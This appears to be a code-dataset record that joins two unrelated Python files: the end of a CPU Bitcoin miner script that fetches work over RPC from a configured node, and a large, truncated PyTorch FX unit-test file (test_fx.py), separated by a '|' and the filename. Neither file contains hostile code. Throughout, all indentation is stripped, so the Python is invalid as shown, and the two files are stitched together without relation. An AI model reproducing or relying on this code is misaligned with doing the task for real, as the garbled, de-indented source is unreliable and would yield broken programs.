param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8944
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
test_fx.py
|
# Owner(s): ["oncall: fx"]
import builtins
import contextlib
import copy
import functools
import inspect
import math
import numbers
import io
import operator
import os
import pickle
import sys
import torch
import traceback
import typing
import types
import warnings
import unittest
import torch.nn.utils._stateless as _stateless
from math import sqrt
from torch.multiprocessing import Process
from torch.testing import FileCheck
from torch.testing._internal.common_methods_invocations import op_db
from torch.testing._internal.common_device_type import ops, onlyCPU, instantiate_device_type_tests
import torch.utils._pytree as pytree
import torch.fx._pytree as fx_pytree
from torch.fx import symbolic_trace, Proxy, Node, GraphModule, Interpreter, Tracer, Transformer, Graph, wrap, PH, CodeGen
from torch.fx.node import Target, Argument, _format_arg
from torch.fx.passes import shape_prop
from torch.fx.immutable_collections import immutable_dict, immutable_list
from torch.fx.experimental.rewriter import RewritingTracer
from torch.fx.operator_schemas import get_signature_for_torch_op
from copy import deepcopy
from collections import namedtuple
from torch.fx.proxy import TraceError
from torch.fx._compatibility import _BACK_COMPAT_OBJECTS, _MARKED_WITH_COMATIBLITY
from fx.test_subgraph_rewriter import TestSubgraphRewriter # noqa: F401
from fx.test_dce_pass import TestDCE # noqa: F401
from fx.test_fx_const_fold import TestConstFold # noqa: F401
from fx.test_fx_param_shape_control_flow import TestConstParamShapeInControlFlow # noqa: F401
if sys.version_info >= (3, 7):
from fx.test_gradual_type import AnnotationsTest # noqa: F401
if sys.version_info >= (3, 7):
from fx.test_gradual_type import TypeCheckerTest # noqa: F401
from typing import Any, Callable, Dict, NamedTuple, List, Optional, Tuple, Union
from torch.testing._internal.common_utils import (
IS_FBCODE,
IS_MACOS,
IS_WINDOWS,
TEST_WITH_ROCM,
find_library_location,
run_tests,
)
from torch.testing._internal.jit_utils import JitTestCase
from fx.named_tup import MyNamedTup
try:
from torchvision import models as torchvision_models
HAS_TORCHVISION = True
except ImportError:
HAS_TORCHVISION = False
skipIfNoTorchVision = unittest.skipIf(not HAS_TORCHVISION, "no torchvision")
class SimpleTest(torch.nn.Module):
def forward(self, x):
return torch.relu(x + 3.0)
def a_non_torch_leaf(a, b):
return a + b
# Used for test_autowrap_function. Autowrapped functions need to be global
def fx_int(x: float) -> int:
return int(x)
def fx_int_x2(x: float) -> int:
return int(x) * 2
# used in test_pytree. It's all the way out here because pickling a GraphModule
# that uses Point errors out if Point is local to the function
Point = namedtuple('Point', ['x', 'y'])
# Test wrap() passing both a function name as well as a function
# directly
def a_lifted_leaf(a, b):
return a[0] + a[1] + b
wrap('a_lifted_leaf')
# Test wrapping twice doesn't break anything
wrap('a_lifted_leaf')
def a_lifted_leaf2(a, b):
return a[0] + a[1] + b
wrap(a_lifted_leaf2)
wrap('len')
wrap('getattr')
def wrapped_named_tup(p1, *, p2):
return p1.x + p2.y
wrap(wrapped_named_tup)
@wrap
def wrapped_via_decorator(a):
return a + 1
wrap('wrapped_with_submodule')
def wrapped_with_submodule(x: torch.Tensor, batchnorm1d: torch.nn.BatchNorm1d):
return batchnorm1d(x)
real_wrapped_via_decorator = wrapped_via_decorator
real_a_lifed_leaf = a_lifted_leaf
real_a_lifed_leaf2 = a_lifted_leaf2
_sqrt = sqrt
wrap('wrapper_fn')
def wrapper_fn(x):
return torch.foo(x)
class Pair(NamedTuple):
x : torch.Tensor
y : torch.Tensor
def _custom_fx_repr_fn(self) -> str:
return f"Pair(x={_format_arg(self.x)}, y={_format_arg(self.y)})"
# for testing pytrees
class Foo(object): # noqa: B209
def __init__(self, a, b):
self.a = a
self.b = b
class TestFX(JitTestCase):
def setUp(self):
super().setUp()
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
if not (TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS):
lib_file_path = find_library_location('libtorchbind_test.so')
torch.ops.load_library(str(lib_file_path))
def tearDown(self):
super().tearDown()
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
def checkGraphModule(self, m: torch.nn.Module, args, kwargs=None):
"""Check that an nn.Module's results match the GraphModule version
for a given set of args/kwargs.
"""
kwargs = kwargs if kwargs else {}
ref_outs = m(*args, **kwargs)
gm = symbolic_trace(m)
gm.graph.lint()
test_outs = gm(*args, **kwargs)
self.assertEqual(ref_outs, test_outs)
def test_graph_module(self):
class MySub(torch.nn.Module):
def __init__(self):
super().__init__()
self.w = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.w + x
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.lin = torch.nn.Linear(4, 3)
self.sub_mod = MySub()
self.w = torch.nn.Parameter(torch.rand(3))
def forward(self, A, B, c):
t = torch.sigmoid(A) + self.lin(c)
return self.sub_mod(t.data + self.w + t + 1 - A + B // A + -A + A.add(B, alpha=3))
m = MyModule()
gm = symbolic_trace(m)
ms = torch.jit.script(gm)
class M2(torch.nn.Module):
def forward(self, A):
m, idx = torch.max(A, 0)
return m + 1, idx + 1
m2 = M2()
gm2 = symbolic_trace(m2)
class T(torch.nn.Module):
def forward(self, A, b=4, *args, c=5, **kwargs):
x = A + 1 + args[0] + kwargs['3']
return x
t = T()
symbolic_trace(t)
# test for issue described at https://github.com/pytorch/pytorch/issues/63883
class M3(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
m3 = M3()
gm3 = symbolic_trace(m3)
new_instance = gm3.__new__(type(gm3))
new_instance.__init__(gm3, gm3.graph)
x = torch.randn(5, 3)
torch.testing.assert_allclose(new_instance(x), torch.relu(x))
def test_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(torch.sin(x + y), gm(x, y))
def test_args_kwargs(self):
class T(torch.nn.Module):
def forward(self, *args, **kwargs):
x = args[0] + kwargs['foo']
return x
t = T()
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_args_kwargs_no_self(self):
class T(torch.nn.Module):
def forward(*args, **kwargs): # noqa: B902
self = args[0]
return torch.relu(args[1])
t = T()
with self.assertRaisesRegex(RuntimeError, r'cannot be part of \*args expansion'):
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_fx_shifts(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x << 3, x >> 3
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_fx_and_or(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x & x, x | x
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_dict(self):
class MyDictMod(torch.nn.Module):
def forward(self, d):
return d['3'].relu(), {'4' : d['3'].neg()}
input_dict = {'3': torch.rand(3, 4)}
m = MyDictMod()
self.checkGraphModule(m, (input_dict,))
def test_matmul_tracing(self):
const = torch.randn(3)
def matmul_f(x):
return x @ const
mod = symbolic_trace(matmul_f)
inp = torch.randn(3)
self.assertEqual(mod(inp), matmul_f(inp))
def rmatmul_f(x):
return const @ x
mod = symbolic_trace(rmatmul_f)
inp = torch.randn(3)
self.assertEqual(mod(inp), rmatmul_f(inp))
def test_disallow_override(self):
# Custom delegate to disallow in-place tensor operations
class NoMutableCallTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
name = target if isinstance(target, str) else torch.typename(target)
if name[-1] == '_':
raise RuntimeError('In-place operations are not supported')
return super().create_node(kind, target, args, kwargs, name)
# Test method
class MyInplaceMod(torch.nn.Module):
def forward(self, x):
x.add_(3.0)
return x
m = MyInplaceMod()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m)
# Test free function
class MyInplaceMod2(torch.nn.Module):
def forward(self, x):
torch.log_(x)
return x
m2 = MyInplaceMod2()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m2)
# Test symbolic node as an arg
class MyInplaceMod3(torch.nn.Module):
def forward(self, x):
y = torch.ones(3, 4)
y.add_(x)
return x
m3 = MyInplaceMod3()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m3)
def test_leaf_module(self):
# Custom delegate to make it so that there are no leaf modules, everything
# should get traced through
class NoLeafModulesTracer(Tracer):
def is_leaf_module(self, m, qualname):
return False
class MyReluMod(torch.nn.Module):
def __init__(self):
super().__init__()
self.relu = torch.nn.ReLU()
def forward(self, x):
return self.relu(x)
mrm = MyReluMod()
sym = NoLeafModulesTracer().trace(mrm)
for node in sym.nodes:
self.assertNotEqual(node.op, 'call_module')
sym.lint()
def test_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf2', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_wrapped_via_decorator(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrapped_via_decorator_and_transformed(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
transformed = torch.fx.Transformer(m).transform()
self.assertIn('wrapped_via_decorator', transformed.code)
self.assertEqual(transformed(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrap_with_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
def forward(self, x: torch.Tensor):
return wrapped_with_submodule(x, self.batchnorm1d)
m = symbolic_trace(M())
self.assertIn("wrapped_with_submodule", m.code)
input = torch.rand(3, 2)
ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
self.assertEqual(ref_batchnorm1d(input), m(input))
def test_wrapped_retrace(self):
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
retraced = symbolic_trace(m)
self.assertIn('wrapped_via_decorator', retraced.code)
self.assertEqual(retraced(0), 1)
def test_graph_edit_with_proxy(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
gm.graph.lint()
self.assertEqual(gm(3, 4), 14)
def test_concrete_arg_none_assert(self):
class Foo(torch.nn.Module):
def forward(self, x, val=None):
return x if val is None else x + val
f = Foo()
traced = torch.fx.symbolic_trace(f, concrete_args={'val' : None})
with self.assertRaisesRegex(AssertionError, 'val has been specialized to have value None'):
traced(torch.randn(5), torch.randn(5))
x = torch.randn(5)
torch.testing.assert_close(traced(x), f(x))
def test_graph_unique_names(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
seen_names : Set[str] = set()
for node in gm.graph.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_stack_traces(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
tracer = torch.fx.Tracer()
tracer.record_stack_traces = True
graph = tracer.trace(M())
# saving the original list because we will insert new nodes as a part of a test
orig_graph_nodes = list(graph.nodes)
for node in orig_graph_nodes:
if node.op == 'output':
continue
self.assertTrue(node.stack_trace is not None)
assert 'test_fx.py' in node.stack_trace
# verify that copying the node does not lose the stack trace
new_node = graph.node_copy(node)
self.assertTrue(new_node.stack_trace is not None)
assert 'test_fx.py' in new_node.stack_trace
def test_graph_unique_names_manual(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'linear_mod', args=(a,), name='foo_1_1')
c : torch.fx.Node = graph.create_node('get_attr', 'y_attr', name='foo_1')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
graph2 = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
graph2.graph_copy(graph, val_map)
seen_names : Set[str] = set()
for node in graph2.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_unpack(self):
class M(torch.nn.Module):
def forward(self, a, b):
c, d = a
return c + d + b
a = (torch.rand(1), torch.rand(1))
b = torch.rand(1)
m = M()
self.checkGraphModule(m, (a, b))
def test_native_callable(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
raise unittest.SkipTest("non-portable load_library call used in test")
# This test exercises the case where we use FX to translate from Python
# code to some native callable object
#
# For the purposes of testing, we use ElementwiseInterpreter defined
# in test_custom_class.cpp.
#
# We test that we can
# 1) Construct a native callable from FX IR
# 2) Construct a drop-in replacement module that delegates to the
# native callable rather than the original code
# 3) Run both the original code and native callable wrapper with
# equivalent results
# 4) TorchScript compile the native callable wrapper and confirm
# equivalent results with the reference
# 5) TorchScript serialize and deserialize the native callable
# and confirm equivalent results with the reference
# We use this simple Module as a reference computation
class MySimpleMod(torch.nn.Module):
def forward(self, x):
return 3.0 * x + x
msm = MySimpleMod()
# This is what a lowering pass might look like: a function that takes
# a valid nn.Module, symbolically traces it, lowers the Module to some
# representation, and wraps that representation up into another
# nn.Module instance that handles dispatch to the compiled/lowered code.
def lower_to_elementwise_interpreter(orig_mod : torch.nn.Module) -> torch.nn.Module:
# ===== Stage 1: Symbolic trace the module =====
mod = symbolic_trace(orig_mod)
# ===== Stage 2: Lower GraphModule representation to the C++
# interpreter's instruction format ======
instructions = []
constant_idx = 0
constants = {}
fn_input_names = []
target_to_name = {
operator.add : "add",
operator.mul : "mul"
}
output_node : Optional[Node] = None
# For each instruction, create a triple
# (instruction_name : str, inputs : List[str], output : str)
# to feed into the C++ interpreter
for n in mod.graph.nodes:
target, args, out_name = n.target, n.args, n.name
assert len(n.kwargs) == 0, "kwargs currently not supported"
if n.op == 'placeholder':
# Placeholders specify function argument names. Save these
# for later when we generate the wrapper GraphModule
fn_input_names.append(target)
elif n.op == 'call_function':
assert target in target_to_name, "Unsupported call target " + target
arg_names = []
for arg in args:
if not isinstance(arg, Node):
# Pull out constants. These constants will later be
# fed to the interpreter C++ object via add_constant()
arg_name = f'constant_{constant_idx}'
constants[arg_name] = torch.tensor(
[arg] if isinstance(arg, numbers.Number) else arg)
arg_names.append(arg_name)
constant_idx += 1
else:
arg_names.append(arg.name)
instructions.append((target_to_name[target], arg_names, out_name))
elif n.op == 'output':
if output_node is not None:
raise RuntimeError('Multiple output nodes!')
output_node = n
else:
raise RuntimeError('Unsupported opcode ' + n.op)
interpreter = torch.classes._TorchScriptTesting._ElementwiseInterpreter()
# Load constants
for k, v in constants.items():
interpreter.add_constant(k, v)
# Specify names for positional input arguments
interpreter.set_input_names(fn_input_names)
# Load instructions
interpreter.set_instructions(instructions)
# Specify name for single output
assert isinstance(output_node.args[0], torch.fx.Node)
interpreter.set_output_name(output_node.args[0].name)
# ===== Stage 3: Create a wrapper GraphModule around the interpreter =====
class WrapperModule(torch.nn.Module):
def __init__(self, interpreter):
super().__init__()
self.interpreter = interpreter
wrapper = WrapperModule(interpreter)
# Create a graph that: 1) Takes function arguments 2) Invokes the interpreter
# 3) Returns the speficied return value
# FIXME: The following code could be greatly simplified by symbolic_trace'ing
# the wrapper with a Tracer that considers the Wrapper instance a root
# module, however, I can't get `__call__` exposed on TorchBind classes
# without it messing up Python `hasattr` for some reason. More digging
# into CPython's implementation of hasattr is probably in order...
graph = torch.fx.Graph()
# Add placeholders for fn inputs
placeholder_nodes = []
for name in fn_input_names:
placeholder_nodes.append(graph.create_node('placeholder', name))
# Get the interpreter object
interpreter_node = graph.create_node('get_attr', 'interpreter')
# Add a node to call the interpreter instance
output_node = graph.create_node(
op='call_method', target='__call__', args=(interpreter_node, placeholder_nodes))
# Register output
graph.output(output_node)
graph.lint()
# Return final GraphModule!!!
return GraphModule(wrapper, graph)
# Lower GraphModule to C++ interpreter
lowered = lower_to_elementwise_interpreter(msm)
# Compare correctness with original module
x = torch.rand(3, 4)
ref_out = msm(x)
test_out = lowered(x)
torch.testing.assert_close(test_out, ref_out)
# Test TorchScript compilation
scripted_lowered = torch.jit.script(lowered)
script_out = scripted_lowered(x)
torch.testing.assert_close(script_out, ref_out)
# Test TorchScript ser/de
import_copy = self.getExportImportCopy(scripted_lowered)
imported_out = import_copy(x)
torch.testing.assert_close(imported_out, ref_out)
def test_reserved_getattr(self):
"""Ensure that we do not name any nodes with a reserved builtin like `getattr`"""
class M(torch.nn.Module):
def forward(self, a):
return a.foo.bar.baz
m = M()
m_g = symbolic_trace(m)
m_g.graph.lint()
for node in m_g.graph.nodes:
self.assertTrue(node.name != "getattr")
@unittest.skip("Hotfix for SEV remediation")
def test_trace_buffer_slice(self):
bs, d_hid = 10, 23
class ExampleCode(torch.nn.Module):
def __init__(self):
super().__init__()
self.mm_param = torch.nn.Parameter(torch.randn(d_hid, d_hid))
self.mm_param2 = torch.nn.Parameter(torch.randn(d_hid, d_hid))
self.lin = torch.nn.Linear(d_hid, d_hid)
self.register_buffer('buffer', torch.randn(bs + 100, d_hid))
def forward(self, x):
x = torch.mm(x, self.mm_param)
skip_connection = x
x = torch.relu(x)
x = torch.mm(x, self.mm_param) + self.buffer[:x.shape[0]]
x = self.lin(x)
x = torch.relu(x)
x = x + skip_connection
x = torch.mm(x, self.mm_param2)
x = self.lin(x)
return x
ec = ExampleCode()
traced = torch.fx.symbolic_trace(ec)
x = torch.randn(bs, d_hid)
torch.testing.assert_allclose(ec(x), traced(x))
def test_node_tagging(self):
class TaggingTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
n = super().create_node(kind, target, args, kwargs, name)
n.tag = 'foo'
return n
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = TaggingTracer().trace(m)
g.lint()
for n in g.nodes:
self.assertTrue(hasattr(n, 'tag'))
self.assertEqual(n.tag, 'foo')
def test_tensor_attribute(self):
class TensorAttribute(torch.nn.Module):
def __init__(self):
super().__init__()
self.tensor = torch.rand(3, 4)
def forward(self, x):
return torch.nn.functional.linear(x, self.tensor)
ta = TensorAttribute()
traced = symbolic_trace(ta)
traced(torch.rand(4, 4))
class WrapperForQualname(torch.nn.Module):
def __init__(self):
super().__init__()
self.ta = TensorAttribute()
def forward(self, x):
return torch.nn.functional.linear(x, self.ta.tensor)
wfq = WrapperForQualname()
traced2 = symbolic_trace(wfq)
traced2.graph.lint()
traced2(torch.rand(4, 4))
def test_tensor_attribute_coalseced(self):
def count_attrs(fx_module):
targets = set()
for node in traced.graph.nodes:
if node.op == 'get_attr':
targets.add(node.target)
return len(targets)
val = torch.tensor(5)
def f(x):
return x + val + val
traced = symbolic_trace(f)
traced.graph.lint()
self.assertEqual(count_attrs(traced), 1)
val2 = torch.tensor(5)
def f(x):
val = torch.tensor(5)
return x + val + val2
traced = symbolic_trace(f)
traced.graph.lint()
self.assertEqual(count_attrs(traced), 2)
def test_symbolic_trace_sequential(self):
class Simple(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
seq = torch.nn.Sequential(
Simple(),
Simple(),
Simple()
)
traced = symbolic_trace(seq)
traced.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(traced(x), seq(x))
def test_tensor_constant(self):
class ConstTensor(torch.nn.Module):
def forward(self, x):
return torch.nn.functional.linear(x, torch.zeros(3, 4))
ct = ConstTensor()
traced = symbolic_trace(ct)
traced.graph.lint()
traced(torch.rand(4, 4))
def test_pickle_graphmodule(self):
class Nested(torch.nn.Module):
def __init__(self):
super().__init__()
self.st = torch.nn.Linear(4, 4)
def forward(self, x):
return self.st(x)
n = Nested()
traced = symbolic_trace(n)
traced.graph.lint()
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(loaded(x), traced(x))
def test_pickle_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(loaded(x, y), gm(x, y))
def test_all_input_nodes(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.placeholder('x')
b : torch.fx.Node = graph.call_module('linear_mod', args=(a,))
c : torch.fx.Node = graph.get_attr('y_attr')
d : torch.fx.Node = graph.call_function(operator.add, args=(b, c))
e : torch.fx.Node = graph.call_function(torch.unsqueeze, args=(d, 0))
graph.output(e)
graph.lint()
self.assertEqual(b.all_input_nodes, [a])
self.assertEqual(c.all_input_nodes, [])
self.assertEqual(d.all_input_nodes, [b, c])
self.assertEqual(e.all_input_nodes, [d])
def test_deepcopy_graphmodule_with_transform(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
def transform(traced):
new_graph = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_value = new_graph.graph_copy(traced.graph, val_map)
relu_out = new_graph.create_node(
op='call_method', target='neg', args=(output_value,), kwargs={})
new_graph.output(relu_out)
return GraphModule(traced, new_graph)
transformed = transform(traced)
transformed.graph.lint()
copied = copy.deepcopy(transformed)
self.assertNotEqual(id(type(transformed)), id(type(copied)))
x = torch.randn(3, 4)
self.assertEqual(copied(x), transformed(x))
def test_deepcopy_with_submods_params(self):
class Bar(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
def forward(self, x):
return torch.relu(x) + self.param
class Baz(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.bar = Bar()
def forward(self, x):
return self.bar(x) - self.param
baz = Baz()
traced = symbolic_trace(baz)
traced.graph.lint()
copied = copy.deepcopy(traced)
copied.graph.lint()
def test_deepcopy_graph_with_tracer_cls(self):
class TestTracer(Tracer):
def is_leaf_module(self, module, name):
return True
g = Graph(tracer_cls=TestTracer)
x = g.placeholder("x")
g.output(x)
h = copy.deepcopy(g)
self.assertIsNotNone(h._tracer_cls)
self.assertTrue(g._tracer_cls == h._tracer_cls)
def test_unpack_list_better_error(self):
class SomeArgs(torch.nn.Module):
def forward(self, a, b):
return torch.rand(3, 4)
class UnpacksList(torch.nn.Module):
def __init__(self):
super().__init__()
self.sa = SomeArgs()
def forward(self, x : list):
return self.sa(*x)
ul = UnpacksList()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ul)
def test_unpack_dict_better_error(self):
class SomeKwargs(torch.nn.Module):
def forward(self, x=3, y=4):
return torch.rand(3, 4)
class UnpacksDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.sk = SomeKwargs()
def forward(self, x : dict):
return self.sk(**x)
ud = UnpacksDict()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ud)
def test_pretty_print_targets(self):
# Test that Graph pretty-print prints friendly name for targets
# in `operator` and `builtins`
class SomeMod(torch.nn.Module):
def forward(self, x):
return torch.add(x.foo + x.bar, 3.0)
traced = symbolic_trace(SomeMod())
graph_str = str(traced.graph)
self.assertIn('builtins.getattr', graph_str)
self.assertIn('operator.add', graph_str)
self.assertIn('torch.add', graph_str)
def test_pretty_print_node(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.param: torch.nn.Parameter = torch.nn.Parameter(
torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x: torch.Tensor, y: int = 2):
return self.linear(x[y] + self.param).clamp(min=0.0, max=1.0)
traced = symbolic_trace(M())
all_formatted = "\n".join([n.format_node() for n in traced.graph.nodes])
FileCheck().check("x").check("placeholder") \
.check("y").check("placeholder") \
.check("getitem").check("call_function") \
.check("param").check("get_attr") \
.check("add").check("call_function") \
.check("linear").check("call_module") \
.check("clamp").check("call_method") \
.run(all_formatted)
def test_script_tensor_constant(self):
# TorchScript seems to ignore attributes that start with `__`.
# We used to call anonymous Tensor values `__tensor_constant*`, but
# they were getting ignored by script. Now they're called
# `_tensor_constant*`
class IHaveATensorConstant(torch.nn.Module):
def forward(self, x):
return x + torch.rand(3, 4)
traced = torch.fx.symbolic_trace(IHaveATensorConstant())
torch.jit.script(traced)
def test_autowrap_functions(self):
class AutowrapFnTest(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2)
class AutowrapFnTest2(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2) + fx_int_x2(x.shape[0] / 2)
# Check function(s) are wrapped
# `int` would normally throw a TypeError as argument can't be `Proxy`
tracer = Tracer(autowrap_functions=(fx_int,))
graph = tracer.trace(AutowrapFnTest())
traced = GraphModule(tracer.root, graph, 'test')
tracer_2 = Tracer(autowrap_functions=(fx_int, fx_int_x2))
tracer_2.trace(AutowrapFnTest2())
# Test scriptability
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(4)), 2)
def test_tuple_no_subscript(self):
def foo(x : Tuple):
return x[0]
traced = torch.fx.symbolic_trace(foo)
x = (torch.randn(5, 3),)
torch.testing.assert_allclose(traced(x), x[0])
bio = io.BytesIO()
torch.save(traced, bio)
bio.seek(0)
loaded = torch.load(bio)
torch.testing.assert_allclose(loaded(x), x[0])
def test_torch_fx_len(self):
class FXLenTest(torch.nn.Module):
def forward(self, x):
return len(x)
traced = symbolic_trace(FXLenTest())
self.assertEqual(traced(torch.rand(3, 4)), 3)
# Test scriptability
